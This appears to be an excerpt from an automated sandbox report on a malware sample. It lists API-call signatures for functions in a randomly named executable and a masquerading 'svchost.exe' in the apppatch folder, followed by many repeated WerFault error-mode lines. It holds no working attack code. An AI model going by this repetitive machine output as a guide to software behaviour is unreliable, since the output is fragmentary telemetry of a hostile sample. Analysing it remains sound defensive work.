Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0132D300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0132CD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01329ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_01329ED0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_013ED300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_013ECD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_013E9ED0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,8_2_0151D300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,8_2_0151CD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01519ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,8_2_01519ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02655720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02655720
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
